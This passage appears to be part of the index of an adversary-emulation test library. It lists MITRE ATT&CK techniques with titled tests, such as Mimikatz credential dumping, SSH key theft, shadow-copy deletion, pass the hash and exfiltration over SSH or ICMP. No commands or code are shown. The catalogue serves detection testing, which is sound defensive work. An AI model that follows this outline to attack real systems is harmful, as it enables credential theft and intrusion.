- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- T1486 Data Encrypted for Impact CONTRIBUTE A TEST
- T1491 Defacement CONTRIBUTE A TEST
- T1488 Disk Content Wipe CONTRIBUTE A TEST
- T1487 Disk Structure Wipe CONTRIBUTE A TEST
- T1499 Endpoint Denial of Service CONTRIBUTE A TEST
- T1495 Firmware Corruption CONTRIBUTE A TEST
- T1490 Inhibit System Recovery
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- T1498 Network Denial of Service CONTRIBUTE A TEST
- T1496 Resource Hijacking
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1494 Runtime Data Manipulation CONTRIBUTE A TEST
- T1489 Service Stop
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1492 Stored Data Manipulation CONTRIBUTE A TEST
- T1529 System Shutdown/Reboot
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #3: Restart System via shutdown - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via shutdown - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via reboot - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via halt - Linux [linux]
- Atomic Test #7: Reboot System via halt - Linux [linux]
- Atomic Test #8: Shutdown System via poweroff - Linux [linux]
- Atomic Test #9: Reboot System via poweroff - Linux [linux]
- T1493 Transmitted Data Manipulation CONTRIBUTE A TEST
- T1087 Account Discovery
- Atomic Test #1: Enumerate all accounts [linux, macos]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux, macos]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- Atomic Test #8: Enumerate all accounts [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell [windows]
- Atomic Test #10: Enumerate logged on users [windows]
- Atomic Test #11: Enumerate logged on users via PowerShell [windows]
- T1010 Application Window Discovery
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1217 Browser Bookmark Discovery
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome Bookmarks on Windows with command prompt [windows]
- T1538 Cloud Service Dashboard CONTRIBUTE A TEST
- T1526 Cloud Service Discovery CONTRIBUTE A TEST
- T1482 Domain Trust Discovery
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- T1083 File and Directory Discovery
- Atomic Test #1: File and Directory Discovery [windows]
- Atomic Test #2: File and Directory Discovery [windows]
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery [macos, linux]
- T1046 Network Service Scanning
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- T1135 Network Share Discovery
- Atomic Test #1: Network Share Discovery [macos, linux]
- Atomic Test #2: Network Share Discovery command prompt [windows]
- Atomic Test #3: Network Share Discovery PowerShell [windows]
- Atomic Test #4: View available share drives [windows]
- T1040 Network Sniffing
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture MacOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Packet Capture PowerShell [windows]
- T1201 Password Policy Discovery
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #7: Examine password policy - macOS [macos]
- T1120 Peripheral Device Discovery CONTRIBUTE A TEST
- T1069 Permission Groups Discovery
- Atomic Test #1: Permission Groups Discovery [macos, linux]
- Atomic Test #2: Basic Permission Groups Discovery Windows [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell [windows]
- Atomic Test #4: Elevated group enumeration using net group [windows]
- T1057 Process Discovery
- Atomic Test #1: Process Discovery - ps [macos, linux]
- Atomic Test #2: Process Discovery - tasklist [windows]
- T1012 Query Registry
- Atomic Test #1: Query Registry [windows]
- T1018 Remote System Discovery
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- T1063 Security Software Discovery
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
- Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #5: Security Software Discovery - AV Discovery via WMI [windows]
- T1518 Software Discovery
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- T1082 System Information Discovery
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- T1016 System Network Configuration Discovery
- Atomic Test #1: System Network Configuration Discovery [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (Trickbot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- T1049 System Network Connections Discovery
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1033 System Owner/User Discovery
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1007 System Service Discovery
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- T1124 System Time Discovery
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- T1497 Virtualization/Sandbox Evasion CONTRIBUTE A TEST
- T1098 Account Manipulation
- Atomic Test #1: Admin Account Manipulate [windows]
- T1139 Bash History
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force
- Atomic Test #1: Brute Force Credentials [windows]
- T1522 Cloud Instance Metadata API CONTRIBUTE A TEST
- T1003 Credential Dumping
- Atomic Test #1: Powershell Mimikatz [windows]
- Atomic Test #2: Gsecdump [windows]
- Atomic Test #3: Windows Credential Editor [windows]
- Atomic Test #4: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #5: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
- Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #11: GPP Passwords (findstr) [windows]
- Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
- Atomic Test #13: LSASS read with pypykatz [windows]
- Atomic Test #14: Registry parse with pypykatz [windows]
- T1503 Credentials from Web Browsers CONTRIBUTE A TEST
- T1081 Credentials in Files
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- T1214 Credentials in Registry
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access CONTRIBUTE A TEST
- T1187 Forced Authentication CONTRIBUTE A TEST
- T1179 Hooking
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1056 Input Capture
- Atomic Test #1: Input Capture [windows]
- T1141 Input Prompt
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1208 Kerberoasting
- Atomic Test #1: Request for service tickets [windows]
- T1142 Keychain
- Atomic Test #1: Keychain [macos]
- T1171 LLMNR/NBT-NS Poisoning and Relay CONTRIBUTE A TEST
- T1040 Network Sniffing
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture MacOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Packet Capture PowerShell [windows]
- T1174 Password Filter DLL
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1145 Private Keys
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1167 Securityd Memory CONTRIBUTE A TEST
- T1528 Steal Application Access Token CONTRIBUTE A TEST
- T1539 Steal Web Session Cookie CONTRIBUTE A TEST
- T1111 Two-Factor Authentication Interception CONTRIBUTE A TEST
- T1155 AppleScript
- Atomic Test #1: AppleScript [macos]
- T1191 CMSTP
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1059 Command-Line Interface
- Atomic Test #1: Command-Line Interface [macos, linux]
- T1223 Compiled HTML File
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1175 Component Object Model and Distributed COM CONTRIBUTE A TEST
- T1196 Control Panel Items
- Atomic Test #1: Control Panel Items [windows]
- T1173 Dynamic Data Exchange
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- T1106 Execution through API CONTRIBUTE A TEST
- T1129 Execution through Module Load CONTRIBUTE A TEST
- T1203 Exploitation for Client Execution CONTRIBUTE A TEST
- T1061 Graphical User Interface CONTRIBUTE A TEST
- T1118 InstallUtil
- Atomic Test #1: InstallUtil uninstall method call [windows]
- Atomic Test #2: InstallUtil GetHelp method call [windows]
- T1177 LSASS Driver CONTRIBUTE A TEST
- T1152 Launchctl
- Atomic Test #1: Launchctl [macos]
- T1168 Local Job Scheduling
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, linux]
- T1170 Mshta
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- T1086 PowerShell
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: BloodHound [windows]
- Atomic Test #3: Obfuscation Tests [windows]
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
- Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #9: Powershell XML requests [windows]
- Atomic Test #10: Powershell invoke mshta.exe download [windows]
- Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #12: PowerShell Fileless Script Execution [windows]
- Atomic Test #13: PowerShell Downgrade Attack [windows]
- Atomic Test #14: NTFS Alternate Data Stream Access [windows]
- T1121 Regsvcs/Regasm
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- T1117 Regsvr32
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- T1085 Rundll32
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 advpack.dll Execution [windows]
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- T1053 Scheduled Task
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- T1064 Scripting
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Create and Execute Batch Script [windows]
- T1035 Service Execution
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1218 Signed Binary Proxy Execution
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
- Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- T1216 Signed Script Proxy Execution
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1153 Source
- Atomic Test #1: Execute Script using Source [macos, linux]
- Atomic Test #2: Execute Script using Source Alias [macos, linux]
- T1151 Space after Filename
- Atomic Test #1: Space After Filename [macos]
- T1072 Third-party Software CONTRIBUTE A TEST
- T1154 Trap
- Atomic Test #1: Trap [macos, linux]
- T1127 Trusted Developer Utilities
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1204 User Execution CONTRIBUTE A TEST
- T1047 Windows Management Instrumentation
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- T1028 Windows Remote Management
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]
- Atomic Test #5: Invoke-Command [windows]
- T1220 XSL Script Processing
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- T1155 AppleScript
- Atomic Test #1: AppleScript [macos]
- T1527 Application Access Token CONTRIBUTE A TEST
- T1017 Application Deployment Software CONTRIBUTE A TEST
- T1175 Component Object Model and Distributed COM CONTRIBUTE A TEST
- T1210 Exploitation of Remote Services CONTRIBUTE A TEST
- T1534 Internal Spearphishing CONTRIBUTE A TEST
- T1037 Logon Scripts
- Atomic Test #1: Logon Scripts [windows]
- Atomic Test #2: Startup Folder Script [windows]
- Atomic Test #3: Scheduled Task Startup Script [windows]
- Atomic Test #4: Logon Scripts - Mac [macos]
- T1075 Pass the Hash
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- T1097 Pass the Ticket
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- T1076 Remote Desktop Protocol
- Atomic Test #1: RDP [windows]
- Atomic Test #2: RDP to Domain Controller [windows]
- T1105 Remote File Copy
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- T1021 Remote Services CONTRIBUTE A TEST
- T1091 Replication Through Removable Media CONTRIBUTE A TEST
- T1184 SSH Hijacking CONTRIBUTE A TEST
- T1051 Shared Webroot CONTRIBUTE A TEST
- T1080 Taint Shared Content CONTRIBUTE A TEST
- T1072 Third-party Software CONTRIBUTE A TEST
- T1506 Web Session Cookie CONTRIBUTE A TEST
- T1077 Windows Admin Shares
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1028 Windows Remote Management
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]
- Atomic Test #5: Invoke-Command [windows]
- T1123 Audio Capture
- Atomic Test #1: using device audio capture commandlet [windows]
- T1119 Automated Collection
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- T1115 Clipboard Data
- Atomic Test #1: Utilize Clipboard to Store or Execute Commands [windows]
- Atomic Test #2: PowerShell [windows]
- T1074 Data Staged
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- T1530 Data from Cloud Storage Object CONTRIBUTE A TEST
- T1213 Data from Information Repositories CONTRIBUTE A TEST
- T1005 Data from Local System
- Atomic Test #1: Search macOS Safari Cookies [macos]
- T1039 Data from Network Shared Drive CONTRIBUTE A TEST
- T1025 Data from Removable Media CONTRIBUTE A TEST
- T1114 Email Collection
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
- T1056 Input Capture
- Atomic Test #1: Input Capture [windows]
- T1185 Man in the Browser CONTRIBUTE A TEST
- T1113 Screen Capture
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Import [linux]
- T1125 Video Capture CONTRIBUTE A TEST
- T1020 Automated Exfiltration CONTRIBUTE A TEST
- T1002 Data Compressed
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- Atomic Test #2: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #3: Data Compressed - nix - zip [linux, macos]
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- T1022 Data Encrypted
- Atomic Test #1: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- T1030 Data Transfer Size Limits
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1048 Exfiltration Over Alternative Protocol
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - ICMP [windows]
- T1041 Exfiltration Over Command and Control Channel CONTRIBUTE A TEST
- T1011 Exfiltration Over Other Network Medium CONTRIBUTE A TEST
- T1052 Exfiltration Over Physical Medium CONTRIBUTE A TEST
- T1029 Scheduled Transfer CONTRIBUTE A TEST
- T1537 Transfer Data to Cloud Account CONTRIBUTE A TEST
- T1043 Commonly Used Port CONTRIBUTE A TEST
- T1092 Communication Through Removable Media CONTRIBUTE A TEST
- T1090 Connection Proxy
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol CONTRIBUTE A TEST
- T1024 Custom Cryptographic Protocol CONTRIBUTE A TEST
- T1132 Data Encoding
- Atomic Test #1: Base64 Encoded Data [macos, linux]
- T1001 Data Obfuscation CONTRIBUTE A TEST
- T1172 Domain Fronting CONTRIBUTE A TEST
- T1483 Domain Generation Algorithms CONTRIBUTE A TEST
- T1008 Fallback Channels CONTRIBUTE A TEST
- T1104 Multi-Stage Channels CONTRIBUTE A TEST
- T1188 Multi-hop Proxy CONTRIBUTE A TEST
- T1026 Multiband Communication CONTRIBUTE A TEST
- T1079 Multilayer Encryption CONTRIBUTE A TEST
- T1205 Port Knocking CONTRIBUTE A TEST
- T1219 Remote Access Tools CONTRIBUTE A TEST
- T1105 Remote File Copy
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- T1071 Standard Application Layer Protocol
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- Atomic Test #4: DNS Large Query Volume [windows]
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- T1032 Standard Cryptographic Protocol
- Atomic Test #1: OpenSSL C2 [windows]
- T1095 Standard Non-Application Layer Protocol CONTRIBUTE A TEST
- T1065 Uncommonly Used Port
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102 Web Service
- Atomic Test #1: Reach out to C2 Pointer URLs via command_prompt [windows]
- Atomic Test #2: Reach out to C2 Pointer URLs via powershell [windows]
- T1189 Drive-by Compromise CONTRIBUTE A TEST
- T1190 Exploit Public-Facing Application CONTRIBUTE A TEST
- T1133 External Remote Services CONTRIBUTE A TEST
- T1200 Hardware Additions CONTRIBUTE A TEST
- T1091 Replication Through Removable Media CONTRIBUTE A TEST
- T1193 Spearphishing Attachment
- Atomic Test #1: Download Phishing Attachment - VBScript [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1192 Spearphishing Link CONTRIBUTE A TEST
- T1194 Spearphishing via Service CONTRIBUTE A TEST
- T1195 Supply Chain Compromise CONTRIBUTE A TEST
- T1199 Trusted Relationship CONTRIBUTE A TEST
- T1078 Valid Accounts CONTRIBUTE A TEST